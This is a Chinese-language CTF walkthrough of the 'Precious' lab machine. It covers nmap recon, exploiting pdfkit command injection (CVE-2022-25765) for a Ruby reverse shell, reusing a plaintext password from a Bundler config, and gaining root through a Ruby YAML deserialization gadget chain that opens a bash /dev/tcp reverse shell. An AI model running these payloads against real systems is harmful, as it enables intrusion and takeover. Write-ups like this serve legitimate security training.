Precious 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.129   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:32 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:2F:D8:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

只开放了 22 和 80 两个端口

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.1.1.129                                  
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:33 EDT
Nmap scan report for 192.1.1.129
Host is up (0.00041s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b1:54:4d:49:a6:1c:09:a4:ac:20:ea:15:6d:f4:9e:7b (RSA)
|   256 43:3c:c8:cd:0e:bc:d8:d1:92:c4:1a:40:4c:5e:3e:93 (ECDSA)
|_  256 6c:6d:c7:c8:4c:3b:01:b5:ea:59:bb:da:7f:fd:bb:c5 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://precious.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
MAC Address: 00:0C:29:2F:D8:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.8 (99%), Linux 5.0 - 5.5 (98%), Linux 5.0 - 5.4 (97%), Linux 3.2 - 4.9 (96%), Linux 2.6.32 - 3.10 (96%), Linux 5.4 (96%), Linux 2.6.32 (96%), Linux 5.3 - 5.4 (95%), Linux 3.1 (95%), Linux 3.2 (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.43 seconds

80 端口重定向到了 precious.htb，将其和 IP 地址的映射写入 /etc/hosts 文件，之后再通过浏览器访问。看一看 udp 扫描的结果

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.129   
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:33 EDT
Nmap scan report for 192.1.1.129
Host is up (0.0025s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   closed        netbios-ns
138/udp   closed        netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:2F:D8:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 27.71 seconds

基本都是关闭状态，nmap 漏洞脚本扫描一下

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nmap --script=vuln -p22,80 192.1.1.129                                  
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-30 10:38 EDT
Nmap scan report for precious.htb (192.1.1.129)
Host is up (0.00032s latency).

PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=precious.htb
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://precious.htb:80/
|     Form id: 
|_    Form action: /
MAC Address: 00:0C:29:2F:D8:2A (VMware)

Nmap done: 1 IP address (1 host up) scanned in 73.89 seconds

Web 服务查看

打开 precious.htb

是一个将 Web 网页转变成 PDF 的在线网站，将 https://www.baidu.com 和 http://precious.htb 分别放进去试试

得到一个 PDF，看起来没什么信息

pdfkit 漏洞

将其下载到本地查看

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ls                     
id23dsowsjm4unj3et1rtntqcdii70py.pdf

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ file id23dsowsjm4unj3et1rtntqcdii70py.pdf 
id23dsowsjm4unj3et1rtntqcdii70py.pdf: PDF document, version 1.4, 1 pages

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ exiftool id23dsowsjm4unj3et1rtntqcdii70py.pdf 
ExifTool Version Number         : 12.57
File Name                       : id23dsowsjm4unj3et1rtntqcdii70py.pdf
Directory                       : .
File Size                       : 24 kB
File Modification Date/Time     : 2023:06:30 10:36:14-04:00
File Access Date/Time           : 2023:06:30 10:36:42-04:00
File Inode Change Date/Time     : 2023:06:30 10:36:14-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 1
Creator                         : Generated by pdfkit v0.8.6

发现这个 PDF 文件是由 pdfkit 创建的，这或许是个突破点？看看有没有相关的漏洞

┌──(kali㉿kali)-[~]
└─$ searchsploit pdfkit    
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
pdfkit v0.8.7.2 - Command Injection                                               | ruby/local/51293.py
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

的确有个脚本，受影响的版本比靶机上的程序还要新，下载到本地看看如何运行这个脚本

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ searchsploit -m 51293
  Exploit: pdfkit v0.8.7.2 - Command Injection
      URL: https://www.exploit-db.com/exploits/51293
     Path: /usr/share/exploitdb/exploits/ruby/local/51293.py
    Codes: CVE-2022–25765
 Verified: True
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Downloads/precious/51293.py

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ python3 51293.py -h                                       
UNICORD Exploit for CVE-2022–25765 (pdfkit) - Command Injection

Usage:
  python3 exploit-CVE-2022–25765.py -c <command>
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port>
  python3 exploit-CVE-2022–25765.py -c <command> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -s <local-IP> <local-port> [-w <http://target.com/index.html> -p <parameter>]
  python3 exploit-CVE-2022–25765.py -h

Options:
  -c    Custom command mode. Provide command to generate custom payload with.
  -s    Reverse shell mode. Provide local IP and port to generate reverse shell payload with.
  -w    URL of website running vulnerable pdfkit. (Optional)
  -p    POST parameter on website running vulnerable pdfkit. (Optional)
  -h    Show this help menu.

可以看到给出了反弹 shell 的例子，我们提取开启监听，尝试反弹 shell。注意这里 post 体表单参数名叫 url

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ python3 51293.py -s 192.1.1.128 443 -w http://precious.htb/ -p url

        _ __,~~~/_        __  ___  _______________  ___  ___
    ,~~`( )_( )-\|       / / / / |/ /  _/ ___/ __ \/ _ \/ _ \
        |/|  `--.       / /_/ /    // // /__/ /_/ / , _/ // /
_V__v___!_!__!_____V____\____/_/|_/___/\___/\____/_/|_/____/....
    
UNICORD: Exploit for CVE-2022–25765 (pdfkit) - Command Injection
OPTIONS: Reverse Shell Sent to Target Website Mode
PAYLOAD: http://%20`ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("192.1.1.128","443"))'`
LOCALIP: 192.1.1.128:443
WARNING: Be sure to start a local listener on the above IP and port. "nc -lnvp 443".
WEBSITE: http://precious.htb/
POSTARG: url
EXPLOIT: Payload sent to website!
SUCCESS: Exploit performed action.

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nc -lvnp 443                                                             
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.129] 41312
whoami
ruby
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:2f:d8:2a brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.129/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 937sec preferred_lft 937sec
    inet6 fe80::20c:29ff:fe2f:d82a/64 scope link 
       valid_lft forever preferred_lft forever
uname -a
Linux precious 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
which python
which python2
which python3
/usr/bin/python3
python3 -c "import pty;pty.spawn('/bin/bash')"
ruby@precious:/var/www/pdfapp$ 

.bundle隐藏文件

完善 shell 后，进行信息收集，看一看有哪些用户

ruby@precious:/var/www/pdfapp$ cat /etc/passwd | grep bash
cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
gaoxiaodiao:x:1000:1000:gaoxiaodiao:/home/gaoxiaodiao:/bin/bash
ruby:x:1001:1001:,,,:/home/ruby:/bin/bash
henry:x:1002:1002:,,,:/home/henry:/bin/bash

比想象中多，那按照一般的逻辑来看，应该是先进行用户的切换再进行提权操作，继续信息收集吧，进入家目录看看

ruby@precious:~$ ls -liah
ls -liah
total 28K
393257 drwxr-xr-x 4 ruby ruby 4.0K Jun 12 04:23 .
393218 drwxr-xr-x 5 root root 4.0K Jun 12 04:23 ..
393274 lrwxrwxrwx 1 ruby ruby    9 Jun 12 04:23 .bash_history -> /dev/null
393258 -rw-r--r-- 1 ruby ruby  220 Jun 12 04:23 .bash_logout
393259 -rw-r--r-- 1 ruby ruby 3.7K Jun 12 04:23 .bashrc
393254 dr-xr-xr-x 2 ruby ruby 4.0K Jun 12 04:23 .bundle
393267 drwxr-xr-x 4 ruby ruby 4.0K Jun 30 14:35 .cache
393260 -rw-r--r-- 1 ruby ruby  807 Jun 12 04:23 .profile

家目录中有两个隐藏文件夹 .bundle 和 .bundle，进去看看

ruby@precious:~$ cd .bundle
cd .bundle
ruby@precious:~/.bundle$ ls -liah
ls -liah
total 12K
393254 dr-xr-xr-x 2 ruby ruby 4.0K Jun 12 04:23 .
393257 drwxr-xr-x 4 ruby ruby 4.0K Jun 12 04:23 ..
393266 -r-xr-xr-x 1 ruby ruby   62 Jun 12 04:23 config
ruby@precious:~/.bundle$ cat config
cat config
---
BUNDLE_HTTPS://RUBYGEMS__ORG/: "henry:Q3c1AqGHtoI0aXAYFH"

竟然在这里找到了用户名和密码，那就 ssh 登录吧

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ssh henry@192.1.1.129   
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the ED25519 key sent by the remote host is
SHA256:hhZ2PP71pBNZ2j6slM0FYVNYiySWo+MZtY1HNrglpHs.
Please contact your system administrator.
Add correct host key in /home/kali/.ssh/known_hosts to get rid of this message.
Offending ECDSA key in /home/kali/.ssh/known_hosts:10
  remove with:
  ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.1.1.129"
Host key for 192.1.1.129 has changed and you have requested strict checking.
Host key verification failed.

遇到了个小问题，因为是本地环境，导致 know_hosts 文件中有这个 IP 的历史记录（别的机器），按照上面的提示，使用 ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.1.1.129" 命令就好

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ssh-keygen -f "/home/kali/.ssh/known_hosts" -R "192.1.1.129"
# Host 192.1.1.129 found: line 8
# Host 192.1.1.129 found: line 9
# Host 192.1.1.129 found: line 10
/home/kali/.ssh/known_hosts updated.
Original contents retained as /home/kali/.ssh/known_hosts.old

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ ssh henry@192.1.1.129                                       
The authenticity of host '192.1.1.129 (192.1.1.129)' can\'t be established.
ED25519 key fingerprint is SHA256:hhZ2PP71pBNZ2j6slM0FYVNYiySWo+MZtY1HNrglpHs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.1.1.129' (ED25519) to the list of known hosts.
Last login: Mon Jun 12 05:13:05 2023 from 192.168.42.1

henry@precious:~$ whoami
henry
henry@precious:~$ ls -liah
total 36K
393261 drwxr-xr-x 5 henry henry 4.0K Jun 12 05:10 .
393218 drwxr-xr-x 5 root  root  4.0K Jun 12 04:23 ..
393279 lrwxrwxrwx 1 henry henry    9 Jun 12 04:23 .bash_history -> /dev/null
393262 -rw-r--r-- 1 henry henry  220 Jun 12 04:23 .bash_logout
393263 -rw-r--r-- 1 henry henry 3.9K Jun 12 05:07 .bashrc
393611 drwx------ 2 henry henry 4.0K Jun 12 05:08 .cache
393544 drwx------ 3 henry henry 4.0K Jun 12 04:56 .config
393275 drwxr-xr-x 3 henry henry 4.0K Jun 12 04:23 .local
393264 -rw-r--r-- 1 henry henry  807 Jun 12 04:23 .profile
393612 -rw-r----- 1 henry henry  536 Jun 12 05:01 user.txt
393615 lrwxrwxrwx 1 henry henry    9 Jun 12 05:10 .viminfo -> /dev/null

提权

找到了 user.txt，查看 sudo -l

henry@precious:~$ sudo -l
Matching Defaults entries for henry on precious:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User henry may run the following commands on precious:
    (root) NOPASSWD: /usr/bin/ruby /opt/update_dependencies.rb

sudo -l 竟然有收获，看一看这个文件吧

henry@precious:~$ ls -liah /opt/update_dependencies.rb
210617 -rwxr-xr-x 1 root root 848 Jun 12 04:23 /opt/update_dependencies.rb
henry@precious:~$ cat /opt/update_dependencies.rb
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
    YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
    Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
    gems_local.each do |local_name, local_version|
        if(file_name == local_name)
            if(file_version != local_version)
                puts "Installed version differs from the one specified in file: " + local_name
            else
                puts "Installed version is equals to the one specified in file: " + local_name
            end
        end
    end
end

看起来我可以无密码 sudo 直接使用来使用 ruby 运行 /opt/update_dependencies.rb，而这个 rb 脚本中又加载了 dependencies.yml 文件，根据文件名可以大概判断出，这是个检查依赖和版本的脚本，去谷歌一下看看有没有 exp，先使用 chatgpt 补一下这方面的基础知识

得到一个关键词 包管理器

YAML 反序列化

RubyGems 借助于这个关键词和 yaml 关键词来谷歌 exp

yaml 反序列化，或许这就是我需要的，依次查看，在第二个链接中找到了exp Blind Remote Code Execution through YAML Deserialization (stratumsecurity.com)

修改其中反弹 shell 的目标地址和端口号

---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/reverseshell.stratumsecurity.com/443 0>&1'"
         method_id: :resolve

修改后写入/tmp 下的 dependencies.yml 文件，提前本机开启监听，然后 sudo 命令运行

henry@precious:/tmp$ vim dependencies.yml
henry@precious:/tmp$ sudo /usr/bin/ruby /opt/update_dependencies.rb
sh: 1: reading: not found

反弹成功，找/root 下的 flag，定妆照结束战斗

┌──(kali㉿kali)-[~/Downloads/precious]
└─$ sudo nc -lvnp 443
[sudo] password for kali: 
listening on [any] 443 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.129] 53450
root@precious:/tmp# whoami
whoami
root
root@precious:/tmp# cd /root
cd /root
root@precious:~# cat root.txt
cat root.txt
root@precious:~# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 00:0c:29:2f:d8:2a brd ff:ff:ff:ff:ff:ff
    inet 192.1.1.129/24 brd 192.1.1.255 scope global dynamic ens33
       valid_lft 1429sec preferred_lft 1429sec
    inet6 fe80::20c:29ff:fe2f:d82a/64 scope link 
       valid_lft forever preferred_lft forever
root@precious:~# uname -a
uname -a
Linux precious 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux

补充

.bundle 目录中为什么有用户名和密码

在⽤户⽬录下的 .bundle ⽂件夹中的 config ⽂件是⽤于配置 Bundler（⼀个与 Gem 相关的 ⼯具）的⽂件。Bundler 是⼀个⽤于管理 Ruby 应⽤程序的依赖关系的⼯具，它允许你指 定应⽤程序所需的 Gem 的版本和来源。 该⽂件中的内容是 Bundler 的配置信息。具体来说， BUNDLE_HTTPS://RUBYGEMS__ORG/ 是⼀个 环境变量，它告诉 Bundler 在下载 Gems 时使⽤的 RubyGems 源的 URL。在这个例⼦ 中，源的 URL 是 https://rubygems.org/ ，这是 RubyGems 的官⽅源。 HTB - Precious 2 “henry:Q3c1AqGHtoI0aXAYFH” 是⼀个⽤户名和密码的组合，⽤于访问 RubyGems 源时的⾝份 验证。这⾥的⽤户名是 “henry”，密码是 “Q3c1AqGHtoI0aXAYFH”。这样配置的⽬的是 让 Bundler 在从 RubyGems 源下载 Gems 时⾃动进⾏⾝份验证，以便获取所需的 Gems。 通过配置⽂件，你可以指定不同的源和⾝份验证信息，以适应不同的开发环境和需求。这 使得团队合作或在不同计算机上共享项⽬时更加⽅便，因为所有⼈都可以使⽤相同的 Bundler 配置来获取所需的 Gems。